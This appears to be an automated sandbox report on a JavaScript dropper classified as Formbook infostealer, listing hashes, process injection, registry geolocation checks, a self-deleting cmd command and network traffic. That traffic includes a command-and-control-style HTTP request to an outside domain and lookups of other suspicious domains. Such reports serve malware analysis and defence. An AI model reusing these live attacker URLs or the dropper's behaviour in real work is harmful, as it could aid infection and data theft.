Analysis

max time kernel: 148s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20241007-en
resource tags: arch:x64, arch:x86, image:win10v2004-20241007-en, locale:en-us, os:windows10-2004-x64, system
submitted: 22-12-2024 00:59

Static task: static1
Behavioral task: behavioral1
Sample: ySNxzGtmAt_bin.js
Resource: win7-20241010-en
General

Target: ySNxzGtmAt_bin.js
Size: 343KB
MD5: 2c1b8ce86a48542a827bb302d54eb19c
SHA1: 6c5b668d122791450edb50027312f22d22eeb39b
SHA256: c89f8224348c1c86bf84db8a6596f1ff4fdad498669918393fc6325b7a1476e8
SHA512: 88bcb4feb1e9a0dfc378d106faa5e979c1505c17483e9ae7e68e8782f0563ca0248f712f0f1b384d7c97b7ef65e0665b72af28a5b9852c030cedec7c67ab5e65
SSDEEP: 6144:P+58K9NNqVEmncYRk/ykRCa7ljUuqeYGEirkxMdv1K8glhknGC80F0+WwpOj:lK9NNqVEGVRk/ykRCaRjUGHjrkSXK8gT
Malware Config

Extracted: formbook
Version: 4.1
Campaign: t01w
Signatures

- Formbook family

- Formbook payload (3 IoCs)
  resource / yara_rule:
  - behavioral2/files/0x0007000000023ca3-6.dat: formbook
  - behavioral2/memory/748-12-0x0000000000190000-0x00000000001BF000-memory.dmp: formbook
  - behavioral2/memory/2520-16-0x0000000000B60000-0x0000000000B8F000-memory.dmp: formbook

- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up the country code configured in the registry, likely for geofencing.
  - Key value queried: \REGISTRY\USER\S-1-5-21-4089630652-1596403869-279772308-1000\Control Panel\International\Geo\Nation (wscript.exe)

- Executes dropped EXE (1 IoC)
  - PID 748: bin.exe

- Suspicious use of SetThreadContext (2 IoCs)
  - PID 748 set thread context of 3568 (pid 748, bin.exe, procid_target 56)
  - PID 2520 set thread context of 3568 (pid 2520, wscript.exe, procid_target 56)

- Command and Scripting Interpreter: JavaScript (1 TTP)

- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).

- System Location Discovery: System Language Discovery (1 TTP, 3 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (bin.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (wscript.exe)
  - Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language (cmd.exe)

- Suspicious behavior: EnumeratesProcesses (62 IoCs)
  - pid 748, bin.exe (4 entries)
  - pid 2520, wscript.exe (58 entries)

- Suspicious behavior: MapViewOfSection (5 IoCs)
  - pid 748, bin.exe (3 entries)
  - pid 2520, wscript.exe (2 entries)

- Suspicious use of AdjustPrivilegeToken (2 IoCs)
  - Token: SeDebugPrivilege (pid 748, bin.exe)
  - Token: SeDebugPrivilege (pid 2520, wscript.exe)

- Suspicious use of WriteProcessMemory (11 IoCs)
  - PID 4900 wrote to memory of 2232 (pid 4900, wscript.exe, procid_target 82), 2 entries
  - PID 4900 wrote to memory of 748 (pid 4900, wscript.exe, procid_target 83), 3 entries
  - PID 3568 wrote to memory of 2520 (pid 3568, Explorer.EXE, procid_target 84), 3 entries
  - PID 2520 wrote to memory of 1560 (pid 2520, wscript.exe, procid_target 85), 3 entries
Processes

C:\Windows\Explorer.EXE (PID 3568)
  command line: C:\Windows\Explorer.EXE
  - Suspicious use of WriteProcessMemory

  C:\Windows\system32\wscript.exe (PID 4900)
    command line: wscript.exe C:\Users\Admin\AppData\Local\Temp\ySNxzGtmAt_bin.js
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory

    C:\Windows\System32\wscript.exe (PID 2232)
      command line: "C:\Windows\System32\wscript.exe" //B "C:\Users\Admin\AppData\Roaming\qbXmtbQkpB.js"

    C:\Users\Admin\AppData\Local\Temp\bin.exe (PID 748)
      command line: "C:\Users\Admin\AppData\Local\Temp\bin.exe"
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - System Location Discovery: System Language Discovery
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious behavior: MapViewOfSection
      - Suspicious use of AdjustPrivilegeToken

  C:\Windows\SysWOW64\wscript.exe (PID 2520)
    command line: "C:\Windows\SysWOW64\wscript.exe"
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\cmd.exe (PID 1560)
      command line: /c del "C:\Users\Admin\AppData\Local\Temp\bin.exe"
      - System Location Discovery: System Language Discovery
Network

DNS (remote address 8.8.8.8:53)
- Request: 149.220.183.52.in-addr.arpa IN PTR; Response: (empty)
- Request: 81.144.22.2.in-addr.arpa IN PTR; Response: 81.144.22.2.in-addr.arpa IN PTR a2-22-144-81.deploy.static.akamaitechnologies.com
- Request: 72.32.126.40.in-addr.arpa IN PTR; Response: (empty)
- Request: 95.221.229.192.in-addr.arpa IN PTR; Response: (empty)
- Request: 13.86.106.20.in-addr.arpa IN PTR; Response: (empty)
- Request: 28.118.140.52.in-addr.arpa IN PTR; Response: (empty)
- Request: 197.87.175.4.in-addr.arpa IN PTR; Response: (empty)
- Request: 171.39.242.20.in-addr.arpa IN PTR; Response: (empty)
- Request: 107.12.20.2.in-addr.arpa IN PTR; Response: 107.12.20.2.in-addr.arpa IN PTR a2-20-12-107.deploy.static.akamaitechnologies.com
- Request: www.vazra.top IN A; Response: (empty)
- Request: www.homecrowds.net IN A; Response: www.homecrowds.net IN CNAME parkingpage.namecheap.com; parkingpage.namecheap.com IN A 91.195.240.19

HTTP (process Explorer.EXE, remote address 91.195.240.19:80)
GET http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G
Request:
GET /t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G HTTP/1.1
Host: www.homecrowds.net
Connection: close
Response:
HTTP/1.1 403 Forbidden
cache-control: no-cache
content-type: text/html
connection: close

DNS (remote address 8.8.8.8:53)
- Request: 19.240.195.91.in-addr.arpa IN PTR; Response: (empty)
- Request: www.omgsweepsship.com IN A; Response: (empty)
- Request: 13.227.111.52.in-addr.arpa IN PTR; Response: (empty)
- Request: www.ulvabuyout.xyz IN A; Response: (empty)
- Request: www.adanarinoplasti.xyz IN A; Response: (empty)
- Request: www.secure-internetbanking-help.com IN A; Response: (empty)
Traffic summary (bytes sent, bytes received, packets sent, packets received)

- 91.195.240.19:80, http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G, http, Explorer.EXE: 404 B, 376 B, 5, 4
  HTTP Request: GET http://www.homecrowds.net/t01w/?hBm4JFfx=RaU8XF19lFgAr1wqVa5/ZHhKnGdWYo1Pc7bCDslfvlbr+PB0JD3vZeq+1Ag3iZpTLPaA&LJBD=yVPdwr7xm8YXF0G
  HTTP Response: 403
- DNS Request 149.220.183.52.in-addr.arpa: 73 B, 147 B, 1, 1
- DNS Request 81.144.22.2.in-addr.arpa: 70 B, 133 B, 1, 1
- DNS Request 72.32.126.40.in-addr.arpa: 71 B, 157 B, 1, 1
- DNS Request 95.221.229.192.in-addr.arpa: 73 B, 144 B, 1, 1
- DNS Request 13.86.106.20.in-addr.arpa: 71 B, 157 B, 1, 1
- DNS Request 28.118.140.52.in-addr.arpa: 72 B, 158 B, 1, 1
- DNS Request 197.87.175.4.in-addr.arpa: 71 B, 157 B, 1, 1
- DNS Request 171.39.242.20.in-addr.arpa: 72 B, 158 B, 1, 1
- DNS Request 107.12.20.2.in-addr.arpa: 70 B, 133 B, 1, 1
- DNS Request www.vazra.top: 59 B, 129 B, 1, 1
- DNS Request www.homecrowds.net: 64 B, 119 B, 1, 1
  DNS Response: 91.195.240.19
- DNS Request 19.240.195.91.in-addr.arpa: 72 B, 156 B, 1, 1
- DNS Request www.omgsweepsship.com: 67 B, 140 B, 1, 1
- DNS Request 13.227.111.52.in-addr.arpa: 72 B, 158 B, 1, 1
- DNS Request www.ulvabuyout.xyz: 64 B, 129 B, 1, 1
- DNS Request www.adanarinoplasti.xyz: 69 B, 134 B, 1, 1
- DNS Request www.secure-internetbanking-help.com: 81 B, 154 B, 1, 1
MITRE ATT&CK Enterprise v15
Downloads

- Filesize: 185KB
  MD5: 6b9e28b6f51709866a46b4a8b98a1b6f
  SHA1: 1dcbaffb6aa748637216c498f0fee1f6d399263a
  SHA256: 4d47123169619362bf77feb0a764db9f2773f51374eb7a4ec71cc6f9b01d15f6
  SHA512: 557e807c93283552e7da7f34c8002af3657cabdacfbeb86d5b4336250ef67ccaa54a46bc084105028fd331c6f0e012bd064d7021ca8220d0cbdc5a7a1577f362

- Filesize: 2KB
  MD5: 63eddccafac5a2d46e70ad8368008a2c
  SHA1: 999b0c61359b570044b0f0be55bc490322e80ae6
  SHA256: 5c571d13ce29d36517e2e42e2999627e8d58a3ce037117ab13a904c5fe9b0953
  SHA512: 0775702f1a89fa990c193a3fa123120d2d236535c7e5829a1f806bb4f6bdfd381cb2f2c7b5ab69bd906853110e6dfcc3db1cc3704f2db58ca112d0d7596bc930